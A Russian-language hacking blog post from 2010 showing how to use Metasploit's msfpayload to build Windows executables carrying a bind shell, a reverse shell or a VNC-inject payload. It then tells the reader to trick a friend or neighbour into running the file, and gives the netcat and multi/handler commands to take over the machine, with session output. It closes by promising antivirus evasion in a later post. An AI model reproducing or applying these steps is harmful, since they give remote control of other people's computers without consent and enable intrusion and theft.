mardi 23 mars 2010

Создаем экзешник

Metasploit - это все таки универсальный инструмент. Иногда бывает ситуация, что вломиться напрямую на комп с помощью сплоитов и прочего невозможно и тут можно попробовать замутить кульбит с поворотом, то есть, создать из нужной начинки экзешник, впарить его другу, а затем спокойно подсоединиться :) Здесь то и начинаешь по настоящему ценить возможности MSF

В новой версии MSF произошли некоторые перестановки. Раньше для создания файлов использовался CMD Shell, а теперь это Shell.

Найти его можно в :

C:\Program Files\Metasploit\Framework3\Shell

Нус, приступим :

Для начала, выбираем начинку. Командуем show payloads :

Покажу несколько примеров, а дальше полет фантазии.

1. shell_bind_tcp (ждет подключение на 4444 порт и дает шелл)

Открываем Shell и пишем :

msfpayload windows/shell_bind_tcp LPORT=4444 X >hack.exe

Жмем ENTER и получаем

Все созданные файлы будут сохранены в

C:\Program Files\Metasploit\Framework3\Home\Username

Теперь впариваем наш hack.exe cоседу. Он его открывает, а мы через NetCat :

nc IP victim :4444

2.
windows/shell/reverse_tcp (соединяет с нашим компом и дает шелл)

Таким же макаром :

msfpayload windows/shell/reverse_tcp LHOST=наш IP X >hack.exe

У себя на тачке в консоли:

use multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST наш IP
set LPORT 4444
exploit

[*] Started reverse handler
[*] Starting the payload handler...


Консоль не закрываем и просто ждем. Как только юзверь откроет наш файл, то в консоли появится открытая сессия.

[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Session 1 opened (наш IP:4444 -> 192.168.1.2:1060)
И еще :

windows/vncinject/reverse_tcp

Это чтобы шариться на тачке как на своей, а не через командную строку.

msfpayload windows/vncinject/reverse_tcp LHOST=наш IP LPORT=4444 X > hack.exe

У себя :

use multi/handler
set PAYLOAD
windows/vncinject/reverse_tcp
set LHOST наш IP
set LPORT 4444
exploit


Надеюсь схема понятна, повторюсь, что экзешник можно сделать из любой начинки.

На этом все, удачи в делах наших ...

PC К сожалению, созданные таким способом файлы, в основной своей массе палятся антивирусами, как это обойти будет темой следующих статей.

$vz00r

1 commentaire:

  1. это та консоль, под названием Metasm Shell?

    RépondreSupprimer